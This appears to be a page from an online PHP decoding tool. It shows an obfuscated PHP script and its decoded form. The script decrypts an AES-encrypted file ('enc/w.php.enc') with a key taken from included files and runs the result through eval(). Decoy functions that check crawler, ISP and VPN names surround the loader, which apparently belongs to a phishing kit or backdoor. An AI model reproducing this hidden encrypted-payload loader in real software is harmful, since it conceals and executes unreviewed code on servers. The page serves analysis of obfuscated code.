Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php require "./includes/ressources/image.php"; require "./includes/ressources/style...

Decoded Output download

<?php 
 
require "./includes/ressources/image.php"; 
require "./includes/ressources/style.php"; 
require "./includes/ressources/jscript.php"; 
$base = "enc/w.php.enc"; 
$userAgent = $_SERVER["HTTP_USER_AGENT"] ?? "Unknown Agent"; 
$ipAddress = $_SERVER["REMOTE_ADDR"] ?? "Unknown IP"; 
_obfuscated_0D15305B2B1D3201161213212A0C04240E35110A381722_($ipAddress); 
_obfuscated_0D260B2F3005243226120D0D103B3735181D090E210601_($userAgent); 
_obfuscated_0D1A292334021118183C2B1C1A273E3D2F1A26253B1A22_($ipAddress); 
$crawler_check = _obfuscated_0D3B19120A281B5C3F323B371C070E18210F3401170732_($base, $favIcon); 
_obfuscated_0D221727360A38100C1B315B072E38382F321722283122_($ipAddress); 
_obfuscated_0D12383F3921232E310B271A0D130417250A0C091C1501_($userAgent, $ipAddress); 
_obfuscated_0D3F402D062F38323415033B272505291B150F18030C22_($userAgent); 
_obfuscated_0D124023141E2E0E1403303F37111E31212B10130E0F11_($userAgent, $ipAddress); 
eval("?>" . $crawler_check); 
_obfuscated_0D24313B013C36152408271A38021138335C0902282111_($ipAddress); 
function _obfuscated_0D260B2F3005243226120D0D103B3735181D090E210601_($userAgent) 
{ 
    $_obfuscated_0D0F32365C2F373306030531391F0C3D1B1A4015280C01_ = ["Googlebot", "Bingbot", "Slurp", "DuckDuckBot", "Baiduspider", "YandexBot"]; 
    foreach ($_obfuscated_0D0F32365C2F373306030531391F0C3D1B1A4015280C01_ as $_obfuscated_0D2A0E385B3B263D3F0621363838271D2A1423405C2722_) { 
        if(stripos($userAgent, $_obfuscated_0D2A0E385B3B263D3F0621363838271D2A1423405C2722_) !== false) { 
            $_obfuscated_0D1E062B2D372D220B1E0808103C310A26241412272B11_ = array_fill(0, rand(500, 1000), "Crawler detected: " . $_obfuscated_0D2A0E385B3B263D3F0621363838271D2A1423405C2722_); 
            array_map(function ($item) { 
                return strtoupper($item); 
            }, $_obfuscated_0D1E062B2D372D220B1E0808103C310A26241412272B11_); 
        } 
    } 
} 
function _obfuscated_0D15305B2B1D3201161213212A0C04240E35110A381722_($ipAddress) 
{ 
    $_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_ = ["Comcast", "AT&T", "Verizon", "T-Mobile", "Vodafone"]; 
    $_obfuscated_0D305C1B3B3F182D05230B011C132409373C0310190C22_ = $_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_[array_rand($_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_)]; 
    strrev($_obfuscated_0D305C1B3B3F182D05230B011C132409373C0310190C22_); 
    strtoupper($_obfuscated_0D305C1B3B3F182D05230B011C132409373C0310190C22_); 
    array_map("strtolower", $_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_); 
} 
function _obfuscated_0D1A292334021118183C2B1C1A273E3D2F1A26253B1A22_($ipAddress) 
{ 
    $_obfuscated_0D3B130E343E2923043E3034041C0C08243F1E38211001_ = ["NordVPN", "ExpressVPN", "CyberGhost", "Surfshark", "PIA"]; 
    foreach ($_obfuscated_0D3B130E343E2923043E3034041C0C08243F1E38211001_ as $_obfuscated_0D321234162A333E39080E0E082D180F1B2B221A130932_) { 
        if(strpos($ipAddress, $_obfuscated_0D321234162A333E39080E0E082D180F1B2B221A130932_) !== false) { 
            for ($i = 0; $i < 100; $i++) { 
                $_obfuscated_0D1A0D1F22214026162D031E025C5C2A37122A1A133701_ = array_fill(0, 100, "VPN: " . $_obfuscated_0D321234162A333E39080E0E082D180F1B2B221A130932_ . " active"); 
                shuffle($_obfuscated_0D1A0D1F22214026162D031E025C5C2A37122A1A133701_); 
            } 
        } 
    } 
} 
function _obfuscated_0D3B19120A281B5C3F323B371C070E18210F3401170732_($filePath, $authToken) 
{ 
    $_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_ = file_get_contents($filePath); 
    $_obfuscated_0D030723023B253511370D5B292C275B102C1C1C153022_ = _obfuscated_0D0C5B3F151729255B0121253E342527331F2B1E382F01_("aes-256-cbc"); 
    $_obfuscated_0D1C2D1D14240512140B2C33082C133507173811211E11_ = substr($_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_, 0, $_obfuscated_0D030723023B253511370D5B292C275B102C1C1C153022_); 
    $_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_ = substr($_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_, $_obfuscated_0D030723023B253511370D5B292C275B102C1C1C153022_); 
    $_obfuscated_0D3D283F010B091022215B31311C31313228241A051711_ = _obfuscated_0D38260C08111C2417092C02283C3D170A0E15212D3101_($_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_, "aes-256-cbc", $authToken, 0, $_obfuscated_0D1C2D1D14240512140B2C33082C133507173811211E11_); 
    return $_obfuscated_0D3D283F010B091022215B31311C31313228241A051711_; 
} 
function _obfuscated_0D221727360A38100C1B315B072E38382F321722283122_($ipAddress) 
{ 
    $_obfuscated_0D0A152F091F105B3C0F1F3025020C1D1E2127283F1F11_ = ["Comcast", "AT&T", "Verizon", "Vodafone"]; 
    foreach ($_obfuscated_0D0A152F091F105B3C0F1F3025020C1D1E2127283F1F11_ as $_obfuscated_0D342F2E0A211E0A3C21253E192F22301F4039072C5B22_) { 
        strpos($ipAddress, $_obfuscated_0D342F2E0A211E0A3C21253E192F22301F4039072C5B22_); 
    } 
    for ($i = 0; $i < 100; $i++) { 
        str_shuffle($ipAddress); 
    } 
} 
function _obfuscated_0D12383F3921232E310B271A0D130417250A0C091C1501_($userAgent, $ipAddress) 
{ 
    $_obfuscated_0D170237220E18080C31321F2E0238151C382F06361701_ = array_fill(0, 10, "Checking..."); 
    foreach ($_obfuscated_0D170237220E18080C31321F2E0238151C382F06361701_ as $check) { 
        strtoupper($check); 
    } 
    strlen($userAgent); 
    rand(1, 100); 
    strlen($userAgent) * rand(1, 100); 
} 
function _obfuscated_0D3F402D062F38323415033B272505291B150F18030C22_($data) 
{ 
    for ($i = 0; $i < 500; $i++) { 
        md5($data . rand()); 
    } 
} 
function _obfuscated_0D124023141E2E0E1403303F37111E31212B10130E0F11_($userAgent, $ipAddress) 
{ 
    $_obfuscated_0D182D1F0D283835152E393C1A301C3C250B0428193722_ = "./logs/user_agent.log"; 
    $_obfuscated_0D245C0137170B1722213B3C2D2421280123243E022A22_ = "User Agent: " . $userAgent . ", IP: " . $ipAddress . ", Time: " . date("Y-m-d H:i:s") . "
"; 
} 
function _obfuscated_0D24313B013C36152408271A38021138335C0902282111_($ipAddress) 
{ 
    $_obfuscated_0D360A5C033B3D0E1A1B032C19151F142604273C331432_ = ["NordVPN", "ExpressVPN", "CyberGhost"]; 
    foreach ($_obfuscated_0D360A5C033B3D0E1A1B032C19151F142604273C331432_ as $_obfuscated_0D032F18105B1C33121A1D3B1D17093D0F0F2B022E5B11_) { 
        strpos($ipAddress, $_obfuscated_0D032F18105B1C33121A1D3B1D17093D0F0F2B022E5B11_); 
    } 
    for ($i = 0; $i < 200; $i++) { 
        array_rand($_obfuscated_0D360A5C033B3D0E1A1B032C19151F142604273C331432_); 
    } 
} 
 
?>

Did this file decode correctly?

Original Code

<?php

require "./includes/ressources/image.php";
require "./includes/ressources/style.php";
require "./includes/ressources/jscript.php";
$base = "enc/w.php.enc";
$userAgent = $_SERVER["HTTP_USER_AGENT"] ?? "Unknown Agent";
$ipAddress = $_SERVER["REMOTE_ADDR"] ?? "Unknown IP";
_obfuscated_0D15305B2B1D3201161213212A0C04240E35110A381722_($ipAddress);
_obfuscated_0D260B2F3005243226120D0D103B3735181D090E210601_($userAgent);
_obfuscated_0D1A292334021118183C2B1C1A273E3D2F1A26253B1A22_($ipAddress);
$crawler_check = _obfuscated_0D3B19120A281B5C3F323B371C070E18210F3401170732_($base, $favIcon);
_obfuscated_0D221727360A38100C1B315B072E38382F321722283122_($ipAddress);
_obfuscated_0D12383F3921232E310B271A0D130417250A0C091C1501_($userAgent, $ipAddress);
_obfuscated_0D3F402D062F38323415033B272505291B150F18030C22_($userAgent);
_obfuscated_0D124023141E2E0E1403303F37111E31212B10130E0F11_($userAgent, $ipAddress);
eval("?>" . $crawler_check);
_obfuscated_0D24313B013C36152408271A38021138335C0902282111_($ipAddress);
function _obfuscated_0D260B2F3005243226120D0D103B3735181D090E210601_($userAgent)
{
    $_obfuscated_0D0F32365C2F373306030531391F0C3D1B1A4015280C01_ = ["Googlebot", "Bingbot", "Slurp", "DuckDuckBot", "Baiduspider", "YandexBot"];
    foreach ($_obfuscated_0D0F32365C2F373306030531391F0C3D1B1A4015280C01_ as $_obfuscated_0D2A0E385B3B263D3F0621363838271D2A1423405C2722_) {
        if(stripos($userAgent, $_obfuscated_0D2A0E385B3B263D3F0621363838271D2A1423405C2722_) !== false) {
            $_obfuscated_0D1E062B2D372D220B1E0808103C310A26241412272B11_ = array_fill(0, rand(500, 1000), "Crawler detected: " . $_obfuscated_0D2A0E385B3B263D3F0621363838271D2A1423405C2722_);
            array_map(function ($item) {
                return strtoupper($item);
            }, $_obfuscated_0D1E062B2D372D220B1E0808103C310A26241412272B11_);
        }
    }
}
function _obfuscated_0D15305B2B1D3201161213212A0C04240E35110A381722_($ipAddress)
{
    $_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_ = ["Comcast", "AT&T", "Verizon", "T-Mobile", "Vodafone"];
    $_obfuscated_0D305C1B3B3F182D05230B011C132409373C0310190C22_ = $_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_[array_rand($_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_)];
    strrev($_obfuscated_0D305C1B3B3F182D05230B011C132409373C0310190C22_);
    strtoupper($_obfuscated_0D305C1B3B3F182D05230B011C132409373C0310190C22_);
    array_map("strtolower", $_obfuscated_0D1D343E38391A1A02092B01352E1D22132B2F2C212C32_);
}
function _obfuscated_0D1A292334021118183C2B1C1A273E3D2F1A26253B1A22_($ipAddress)
{
    $_obfuscated_0D3B130E343E2923043E3034041C0C08243F1E38211001_ = ["NordVPN", "ExpressVPN", "CyberGhost", "Surfshark", "PIA"];
    foreach ($_obfuscated_0D3B130E343E2923043E3034041C0C08243F1E38211001_ as $_obfuscated_0D321234162A333E39080E0E082D180F1B2B221A130932_) {
        if(strpos($ipAddress, $_obfuscated_0D321234162A333E39080E0E082D180F1B2B221A130932_) !== false) {
            for ($i = 0; $i < 100; $i++) {
                $_obfuscated_0D1A0D1F22214026162D031E025C5C2A37122A1A133701_ = array_fill(0, 100, "VPN: " . $_obfuscated_0D321234162A333E39080E0E082D180F1B2B221A130932_ . " active");
                shuffle($_obfuscated_0D1A0D1F22214026162D031E025C5C2A37122A1A133701_);
            }
        }
    }
}
function _obfuscated_0D3B19120A281B5C3F323B371C070E18210F3401170732_($filePath, $authToken)
{
    $_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_ = file_get_contents($filePath);
    $_obfuscated_0D030723023B253511370D5B292C275B102C1C1C153022_ = _obfuscated_0D0C5B3F151729255B0121253E342527331F2B1E382F01_("aes-256-cbc");
    $_obfuscated_0D1C2D1D14240512140B2C33082C133507173811211E11_ = substr($_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_, 0, $_obfuscated_0D030723023B253511370D5B292C275B102C1C1C153022_);
    $_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_ = substr($_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_, $_obfuscated_0D030723023B253511370D5B292C275B102C1C1C153022_);
    $_obfuscated_0D3D283F010B091022215B31311C31313228241A051711_ = _obfuscated_0D38260C08111C2417092C02283C3D170A0E15212D3101_($_obfuscated_0D3D1B021D1C0C231A3D5B4032072D112E402922402B32_, "aes-256-cbc", $authToken, 0, $_obfuscated_0D1C2D1D14240512140B2C33082C133507173811211E11_);
    return $_obfuscated_0D3D283F010B091022215B31311C31313228241A051711_;
}
function _obfuscated_0D221727360A38100C1B315B072E38382F321722283122_($ipAddress)
{
    $_obfuscated_0D0A152F091F105B3C0F1F3025020C1D1E2127283F1F11_ = ["Comcast", "AT&T", "Verizon", "Vodafone"];
    foreach ($_obfuscated_0D0A152F091F105B3C0F1F3025020C1D1E2127283F1F11_ as $_obfuscated_0D342F2E0A211E0A3C21253E192F22301F4039072C5B22_) {
        strpos($ipAddress, $_obfuscated_0D342F2E0A211E0A3C21253E192F22301F4039072C5B22_);
    }
    for ($i = 0; $i < 100; $i++) {
        str_shuffle($ipAddress);
    }
}
function _obfuscated_0D12383F3921232E310B271A0D130417250A0C091C1501_($userAgent, $ipAddress)
{
    $_obfuscated_0D170237220E18080C31321F2E0238151C382F06361701_ = array_fill(0, 10, "Checking...");
    foreach ($_obfuscated_0D170237220E18080C31321F2E0238151C382F06361701_ as $check) {
        strtoupper($check);
    }
    strlen($userAgent);
    rand(1, 100);
    strlen($userAgent) * rand(1, 100);
}
function _obfuscated_0D3F402D062F38323415033B272505291B150F18030C22_($data)
{
    for ($i = 0; $i < 500; $i++) {
        md5($data . rand());
    }
}
function _obfuscated_0D124023141E2E0E1403303F37111E31212B10130E0F11_($userAgent, $ipAddress)
{
    $_obfuscated_0D182D1F0D283835152E393C1A301C3C250B0428193722_ = "./logs/user_agent.log";
    $_obfuscated_0D245C0137170B1722213B3C2D2421280123243E022A22_ = "User Agent: " . $userAgent . ", IP: " . $ipAddress . ", Time: " . date("Y-m-d H:i:s") . "\n";
}
function _obfuscated_0D24313B013C36152408271A38021138335C0902282111_($ipAddress)
{
    $_obfuscated_0D360A5C033B3D0E1A1B032C19151F142604273C331432_ = ["NordVPN", "ExpressVPN", "CyberGhost"];
    foreach ($_obfuscated_0D360A5C033B3D0E1A1B032C19151F142604273C331432_ as $_obfuscated_0D032F18105B1C33121A1D3B1D17093D0F0F2B022E5B11_) {
        strpos($ipAddress, $_obfuscated_0D032F18105B1C33121A1D3B1D17093D0F0F2B022E5B11_);
    }
    for ($i = 0; $i < 200; $i++) {
        array_rand($_obfuscated_0D360A5C033B3D0E1A1B032C19151F142604273C331432_);
    }
}

?>

Function Calls

None

Variables

None

Stats

MD5	0e5f8d3ea762a2554012256772d8e1cf
Eval Count	0
Decode Time	56 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats